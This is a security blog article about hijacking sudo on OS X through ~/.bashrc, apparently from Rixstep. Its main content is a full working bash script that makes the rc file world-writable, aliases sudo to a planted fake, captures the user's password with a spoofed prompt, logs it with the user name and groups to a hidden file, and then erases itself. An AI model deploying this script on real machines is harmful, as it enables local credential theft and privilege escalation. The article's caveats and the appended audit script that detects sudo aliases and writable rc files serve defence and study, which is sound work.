
Way Too Much Sudo Fun

Bashing bash again because it's so much fun and above all so easy.

As demonstrated in 'Sudo Fun', it's possible to hijack the Unix sudo command with less than optimal results: OS X boxes can be compromised in a number of ways.

As demonstrated in 'Too Much Sudo Fun', it's possible to humiliate bash without much risk of the maintainers doing anything about it. There ~/.bash_profile was used to accomplish this.

But it turns out even ~/.bashrc - the file bash reads for every interactive non-login shell - can be made into a turkey. And that's demonstrated here and now.

#! /bin/bash
#
# Plant a fake sudo and alias the real one away from ~/.bashrc.
# The two assignments below did not survive extraction; the values are
# taken from the text above (~/.bashrc) and from the self-removal line
# further down (/Users/Shared/sudo).
target="$HOME/.bashrc"
fakesudo="/Users/Shared/sudo"

# Make sure the rc file exists and is writable. (chmod a+w also leaves it
# writable to everyone else on the box.)
if [ -f "$target" ]; then
    if [ ! -w "$target" ]; then
        chmod a+w "$target" 2>/dev/null || exit 1
    fi
else
    touch "$target" 2>/dev/null || exit 1
fi

# Append the alias once. The heredoc is unquoted, so $fakesudo is expanded
# here and the rc file ends up with the literal path.
grep -sq sudo "$target" || cat <<EOF >>"$target"
if [ -x $fakesudo ]; then
    alias sudo="$fakesudo"
fi
EOF

# (Re)create the fake sudo.
if [ -f "$fakesudo" ]; then
    rm -f "$fakesudo" 2>/dev/null
fi

touch "$fakesudo"
chmod a+x "$fakesudo"

echo '#! /bin/bash'>>"$fakesudo"
echo '#'>>"$fakesudo"
echo 'inp=""'>>"$fakesudo"

# Mimic sudo's password prompt with terminal echo turned off.
echo 'stty -echo'>>"$fakesudo"
echo 'read -p "Password:" inp'>>"$fakesudo"
echo 'stty  echo'>>"$fakesudo"
echo 'echo'>>"$fakesudo"

# Log the password, user name and groups in plain text, then fake a failure.
echo 'logfile="/Users/Shared/.keylog" '>>"$fakesudo"
echo 'echo "$inp">>"$logfile"'>>"$fakesudo"
echo 'echo `whoami`>>"$logfile" '>>"$fakesudo"
echo 'echo `groups`>>"$logfile" '>>"$fakesudo"
echo 'echo "Sorry, try again."'>>"$fakesudo"

# Hand the command to the real sudo, which prompts again, so the user just
# sees what looks like a mistyped password.
echo '/usr/bin/sudo "$@"'>>"$fakesudo"

# Remove the evidence and drop the user into a fresh shell; the -x test in
# ~/.bashrc now fails, so the alias is no longer set there.
echo 'rm -f "/Users/Shared/sudo"'>>"$fakesudo"
echo 'bash ' >>"$fakesudo"
echo 'exit 0'>>"$fakesudo"

exit 0

There are a few caveats with this exploit. An alias is only expanded in an interactive shell, so scripts that call sudo are unaffected; ~/.bashrc is read by interactive non-login shells, so a login shell only picks the alias up if ~/.bash_profile sources ~/.bashrc; the victim sees two password prompts, and the fake sudo removes itself after a single capture; the captured password is written in plain text to /Users/Shared/.keylog, where any local user can read it; and the script has to run as the victim, or as someone who can already write to the victim's rc file. Sudo itself is never touched. But it does prove a point. Namely that it's all too easy - not with OS X but with bash - to own a machine.
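The other side of the coin, as an added example that is not part of the original article: a small audit that checks a user's bash startup files for exactly what the script above leaves behind (a group- or world-writable rc file, an alias or function named sudo) and then asks an interactive bash what "sudo" really resolves to after reading the file. The make_demo function builds a throwaway directory with a constructed .bashrc and fake sudo so the checks can be seen to fire; every path and name in it is invented for the demo.

```shell
#!/bin/sh
# Added example (not from the original page): audit bash startup files for the
# sudo hijack described above. For each file audit_rc_file reports
#   WRITABLE  - the file is group- or world-writable (what chmod a+w leaves behind)
#   ALIAS     - it defines an alias named sudo
#   FUNCTION  - it defines a shell function named sudo
# and resolve_sudo shows what "sudo" actually runs once bash has read the file.

# Print one finding per line for startup file $1; return 1 if anything was found.
audit_rc_file() {
    f="$1"
    found=0
    [ -e "$f" ] || return 0
    # -perm -020: group-writable, -perm -002: other-writable
    # (octal modes work with both GNU and BSD find)
    if [ -n "$(find "$f" -perm -020 -o -perm -002 2>/dev/null)" ]; then
        echo "WRITABLE $f"
        found=1
    fi
    if grep -Eq '^[[:space:]]*alias[[:space:]]+sudo=' "$f"; then
        echo "ALIAS $f"
        found=1
    fi
    if grep -Eq '^[[:space:]]*(function[[:space:]]+)?sudo[[:space:]]*\(\)' "$f"; then
        echo "FUNCTION $f"
        found=1
    fi
    return $found
}

# Print what an interactive bash that reads startup file $1 resolves "sudo" to:
# alias, function, file (the real binary), or nothing if it is not found at all.
resolve_sudo() {
    bash --rcfile "$1" -ic 'type -t sudo' 2>/dev/null
}

# Build a throwaway directory holding the lines the attack script appends plus
# an executable fake sudo, and print its path. Constructed input for the demo.
make_demo() {
    d="$(mktemp -d)"
    printf '#!/bin/sh\necho "fake sudo ran: $*"\n' > "$d/sudo"
    chmod 755 "$d/sudo"
    printf 'if [ -x %s/sudo ]; then\n    alias sudo="%s/sudo"\nfi\n' "$d" "$d" > "$d/.bashrc"
    chmod a+w "$d/.bashrc"
    echo "$d"
}

# Audit the real startup files first (nothing printed means clean) ...
for rc in "$HOME/.bashrc" "$HOME/.bash_profile" "$HOME/.profile"; do
    audit_rc_file "$rc" || true
done

# ... then the constructed one, which trips the permission and alias checks.
demo="$(make_demo)"
audit_rc_file "$demo/.bashrc" || echo "demo rc file is compromised (exit status $?)"
echo "sudo in a shell that reads it resolves to: $(resolve_sudo "$demo/.bashrc")"
rm -rf "$demo"
```

The grep patterns catch the alias form used above and the equivalent sudo() function; resolve_sudo is the check that matters when an attacker has been more creative, because it reports whatever bash would actually run regardless of how the rc file spells it. A clean box prints "file" there.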

See Also
Sudo Fun
ACP Services
Resolve Path
Too Much Sudo Fun

Thanks again to GC at the CLIX Exchange for pulling another all nighter.

Copyright © Rixstep. All rights reserved.